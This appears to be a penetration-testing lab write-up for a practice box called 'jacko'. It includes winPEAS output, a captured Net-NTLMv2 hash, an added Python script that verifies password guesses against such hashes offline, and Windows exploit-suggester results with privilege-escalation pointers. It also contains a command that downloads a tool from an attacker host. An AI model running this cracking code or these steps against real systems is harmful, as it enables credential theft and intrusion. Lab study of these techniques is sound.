PEAS


Automated enumeration with winPEAS, run after the manual enumeration. The x86 build is fetched because the shell is a 32-bit process on a 64-bit host (PROCESSOR_ARCHITECTURE is x86 while PROCESSOR_ARCHITEW6432 is AMD64 in the environment output below).

PS C:\tmp> iwr -Uri http://192.168.45.192/winPEASx86.exe -OutFile C:\tmp\winPEASx86.exe

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
    Path: C:\Users\tony\AppData\Local\Microsoft\WindowsApps;;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;
    WRAPPER_ARCH: x86
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERDOMAIN: JACKO
    PROCESSOR_ARCHITECTURE: x86
    ProgramW6432: C:\Program Files
    DriverData: C:\Windows\System32\Drivers\DriverData
    PUBLIC: C:\Users\Public
    APPDATA: C:\Users\tony\AppData\Roaming
    windir: C:\Windows
    LOCALAPPDATA: C:\Users\tony\AppData\Local
    CommonProgramW6432: C:\Program Files\Common Files
    WRAPPER_BITS: 32
    OneDrive: C:\Users\tony\OneDrive
    USERPROFILE: C:\Users\tony
    ProgramFiles: C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramData: C:\ProgramData
    COMPUTERNAME: JACKO
    WRAPPER_PATH_SEPARATOR: ;
    PROCESSOR_ARCHITEW6432: AMD64
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROMPT: $P$G
    WRAPPER_OS: windows
    SystemRoot: C:\Windows
    ComSpec: C:\Windows\system32\cmd.exe
    TEMP: C:\Users\tony\AppData\Local\Temp
    ProgramFiles(x86): C:\Program Files (x86)
    CommonProgramFiles: C:\Program Files (x86)\Common Files
    TMP: C:\Users\tony\AppData\Local\Temp
    PROCESSOR_REVISION: 0101
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ALLUSERSPROFILE: C:\ProgramData
    SystemDrive: C:
    PSModulePath: C:\Users\tony\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    OS: Windows_NT
    PSExecutionPolicyPreference: Bypass
    USERNAME: SYSTEM
    WRAPPER_FILE_SEPARATOR: \
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\JavaTemp\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

Takeaways from the environment output

PROCESSOR_ARCHITECTURE is x86 while PROCESSOR_ARCHITEW6432 is AMD64, and ProgramFiles resolves to C:\Program Files (x86): the shell is a 32-bit process on 64-bit Windows. That is why winPEASx86.exe was used. It also means WOW64 redirection is in effect, so this process sees the 32-bit view of System32 and of the registry; to enumerate from a 64-bit process, start C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe and run the x64 build from there.

PSExecutionPolicyPreference is Bypass: the PowerShell host was launched with -ExecutionPolicy Bypass, so script execution is unrestricted in this session.

USERNAME is SYSTEM in the process environment even though USERPROFILE, APPDATA and TEMP all point to C:\Users\tony, and the WRAPPER_* variables (WRAPPER_OS, WRAPPER_ARCH, WRAPPER_BITS, the separators) are the ones the Java Service Wrapper exports to its child process. The environment was inherited from a service-managed parent rather than an interactive logon; rely on whoami, not on environment variables, for the identity the process actually runs as.

The system Path begins with C:\JavaTemp\ and the Oracle javapath directory, ahead of C:\Windows\system32. A non-standard directory at the head of the machine-wide Path deserves an ACL check (icacls C:\JavaTemp): if the current user can write there, any privileged process that launches a binary by bare name picks up an attacker-supplied file first.

LAPS


LSA Protection


Credentials Guard


UAC


PowerShell


NTLM

Net-NTLMv2 challenge/response captured for tony, in the user::domain:server_challenge:NTProofStr:blob format that hashcat mode 5600 consumes. The server challenge 1122334455667788 is the fixed default of common capture tools (Metasploit's auxiliary/server/capture/smb, older Responder releases), which indicates the response was captured by a listener. It is not an NT hash: it cannot be used for pass-the-hash and has to be cracked offline or relayed.

tony::JACKO:1122334455667788:5e2903d82cc913b83a64185a00aabd91:0101000000000000b8798a4f8c9bdb01201b35b3d0f9a35e000000000800300030000000000000000000000000300000a56182720fa321b79d49a779f0d5032fbe8990181b434f24bb9738542600f9210a00100000000000000000000000000000000000090000000000000000000000
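As an added example (not part of these notes and not code from winPEAS, Responder or hashcat): a Python script that parses the captured line, decodes the timestamp from the NTLMv2 blob, and checks candidate passwords against the NTProofStr exactly as hashcat mode 5600 does (MS-NLMP 3.3.2: NTOWFv2 = HMAC-MD5(MD4(UTF-16LE password), UTF-16LE(UPPER(user) + domain)); NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob)). tony's password is not known here, so the script proves its verifier on a response it forges itself; the password "Summer2025!" and the minimal blob in forge_netntlmv2 are constructed test data. MD4 is implemented in pure Python because hashlib's MD4 is usually disabled under OpenSSL 3.

```python
"""Parse a captured Net-NTLMv2 line (hashcat -m 5600 format) and verify
candidate passwords offline.  Added example; the capture below is the one
from the notes, the forged one is constructed test data."""
import hmac
import struct
from datetime import datetime, timedelta, timezone

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, s: ((x << s) | (x >> (32 - s))) & M32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1: words in order, shifts 3 7 11 19
            a = rol((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0 4 8 12 1 5 9 13 ..., shifts 3 5 9 13
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: fixed word order, shifts 3 9 11 15
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & M32, (B + b) & M32, (C + c) & M32, (D + d) & M32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def nt_proof_str(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob); the domain is
    used as captured, the user name upper-cased, both UTF-16LE (MS-NLMP 3.3.2)."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()


def parse_netntlmv2(line: str) -> dict:
    """Split user::domain:challenge:proof:blob and decode the NTLMv2_CLIENT_CHALLENGE header."""
    user, rest = line.strip().split("::", 1)
    domain, challenge, proof, blob = rest.split(":", 3)
    blob_b = bytes.fromhex(blob)
    if blob_b[:2] != b"\x01\x01":
        raise ValueError("blob does not start with RespType/HiRespType 0x01 0x01")
    filetime = struct.unpack("<Q", blob_b[8:16])[0]  # 100 ns ticks since 1601-01-01 UTC
    return {
        "user": user, "domain": domain,
        "server_challenge": bytes.fromhex(challenge),
        "nt_proof": bytes.fromhex(proof),
        "blob": blob_b,
        "client_challenge": blob_b[16:24],
        "timestamp": datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10),
    }


def check_password(parsed: dict, candidate: str) -> bool:
    """True when the candidate reproduces the captured NTProofStr."""
    proof = nt_proof_str(candidate, parsed["user"], parsed["domain"], parsed["server_challenge"], parsed["blob"])
    return hmac.compare_digest(proof, parsed["nt_proof"])


def crack(parsed: dict, wordlist):
    """Return the first candidate that verifies, or None (what hashcat -m 5600 does at scale)."""
    for word in wordlist:
        if check_password(parsed, word):
            return word
    return None


def forge_netntlmv2(user, domain, password, server_challenge, client_challenge, filetime):
    """Build a line for a known password. Constructed test data: the blob carries an
    empty AV-pair list, which is enough because the MAC covers the blob opaquely."""
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + b"\x00" * 4)
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# The response captured in the notes (password unknown to this example).
CAPTURED = "tony::JACKO:1122334455667788:5e2903d82cc913b83a64185a00aabd91:0101000000000000b8798a4f8c9bdb01201b35b3d0f9a35e000000000800300030000000000000000000000000300000a56182720fa321b79d49a779f0d5032fbe8990181b434f24bb9738542600f9210a00100000000000000000000000000000000000090000000000000000000000"

if __name__ == "__main__":
    p = parse_netntlmv2(CAPTURED)
    print(f"{p['user']}@{p['domain']} challenge={p['server_challenge'].hex()} "
          f"client_challenge={p['client_challenge'].hex()} captured {p['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    print("tiny wordlist result:", crack(p, ["Password1", "Welcome1", "jacko"]))
```

The blob timestamp is the client's clock at authentication time; here it decodes to March 2025, which lines up with the date of the wesng definitions used later in these notes. Bulk cracking still belongs in hashcat (-m 5600), but the verifier above is the whole of what that mode computes per candidate, and the same functions can be pointed at any capture in this format.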

.NET


Token Privileges (tony)


Enumerated

Modifiable Services


Installed Programs


Network


Interesting Files / Directories


WES


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ wes --update ; wes ./sysinfo -c --hide "Internet Explorer" Edge Flash -s critical -e
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250322
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
WARNING:root:termcolor module not installed. To show colored output, install termcolor using: pip3 install termcolor
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 10 Version 1909 for x64-based Systems
    - Generation: 10
    - Build: 18363
    - Version: 1909
    - Architecture: x64-based
    - Installed hotfixes (9): KB4552931, KB4497165, KB4513661, KB4516115, KB4517245, KB4521863, KB4537759, KB4552152, KB4556799
[+] Loading definitions
    - Creation date of definitions: 20250322
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20200512
CVE: CVE-2020-0646
KB: KB4532938
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows 10 Version 1909 for x64-based Systems
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
Date: 20200313
CVE: CVE-2020-0796
KB: KB4551762
Title: Windows SMBv3 Client/Server Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows SMB
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html
 
Date: 20200313
CVE: CVE-2020-0796
KB: KB4551762
Title: Windows SMBv3 Client/Server Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows SMB
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html, http://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html
 
Date: 20210702
CVE: CVE-2021-1675
KB: KB5003635
Title: Windows Print Spooler Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows Print Spooler Components
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html, http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html
 
Date: 20210702
CVE: CVE-2021-1675
KB: KB5003635
Title: Windows Print Spooler Remote Code Execution Vulnerability
Affected product: Windows 10 Version 1909 for x64-based Systems
Affected component: Windows Print Spooler Components
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html, http://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html
 
[-] Missing patches: 3
    - KB4551762: patches 2 vulnerabilities
    - KB5003635: patches 2 vulnerabilities
    - KB4532938: patches 1 vulnerability
[I] KB with the most recent release date
    - ID: KB5003635
    - Release date: 20210702
[+] Done. Displaying 5 of the 62 vulnerabilities found.

Notes on the WES output

wesng only compares the hotfix list from systeminfo (9 KBs here, the newest from May 2020) against its definitions; it does not verify anything on the host. Treat each entry as a candidate and confirm it first: Get-HotFix -Id KB4551762 on the target, and check that the affected component is actually present and running.

CVE-2020-0646 is the SharePoint workflow XOML injection and needs SharePoint; it is not a local privilege escalation path. CVE-2020-0796 (SMBGhost) is listed with its RCE write-ups, but a public local privilege escalation exploit exists for it too, which is the relevant use from a low-privileged shell. CVE-2021-1675 (Print Spooler, fixed in the June 2021 update associated with PrintNightmare) is only exploitable locally if the Spooler service is running (Get-Service Spooler). A CVE appears twice when more than one definition row matches it.

The -s critical filter hides Important-rated issues, which is where most elevation-of-privilege bugs are rated; when the goal is local privesc, rerun with -i "Elevation of Privilege" instead of the severity filter.